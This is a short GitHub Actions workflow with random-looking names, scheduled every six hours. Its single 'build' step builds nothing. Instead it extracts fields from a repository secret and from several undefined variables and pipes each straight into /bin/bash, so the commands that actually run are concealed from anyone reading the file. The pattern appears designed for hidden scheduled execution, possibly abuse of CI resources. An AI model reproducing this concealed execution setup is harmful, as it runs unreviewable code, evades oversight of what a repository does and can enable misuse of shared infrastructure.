name: cuifenbian7641
on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cuifenbian7641
        env:
          doz81: ${{ secrets.doz81 }}
        run: |
          echo $doz81 | jq -r .z94716 | /bin/bash
          echo $qj9846 | jq -r .wf70492 | /bin/bash
          echo $z60 | jq -r .sq43 | /bin/bash
          echo $x663 | jq -r .sd5294 | /bin/bash

